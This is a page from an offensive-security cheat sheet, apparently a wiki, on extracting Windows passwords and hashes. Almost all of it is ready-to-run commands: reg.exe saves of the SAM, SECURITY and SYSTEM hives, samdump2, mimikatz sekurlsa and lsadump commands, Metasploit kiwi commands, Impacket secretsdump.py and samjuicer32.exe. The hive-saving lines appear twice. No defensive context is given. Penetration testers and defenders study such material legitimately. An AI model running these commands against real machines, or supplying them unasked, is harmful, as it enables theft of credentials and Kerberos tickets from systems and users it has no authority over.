C:> reg.exe save hklm\sam c:\windows\temp\sam.save C:> reg.exe save hklm\security c:\windows\temp\security.save C:> reg.exe save hklm\system c:\windows\temp\system.save $ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Password Extraction

In this topic your privilege has to be high privilege.

samdump2

C:> reg save HKLM\SAM c:\SAM
C:> reg save HKLM\System c:\System

$ samdump2 System SAM

mimikatz.exe

Need to match architectures.

privilege::debug
20 ‘OK’

sekurlsa::logonPasswords
lsadump::sam
lsadump::lsa /patch
lsadump::secrets
kerberos::list

Metasploit

load kiwi

creds_all
lsa_dump_lsa
lsa_dump_secrets
kerberos_list

Impacket

Get a copy of the SYSTEM, SECURITY and SAM hives and download them back to your local system.

C:> reg.exe save hklm\sam c:\windows\temp\sam.save
C:> reg.exe save hklm\security c:\windows\temp\security.save
C:> reg.exe save hklm\system c:\windows\temp\system.save

$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

samjuicer32.exe

windows 2000 service pack3 5.00.2195

C:\> samjuicer32.exe

PreviousSpray-Passwords.ps1 NextOffice Macro

Last updated 3 years ago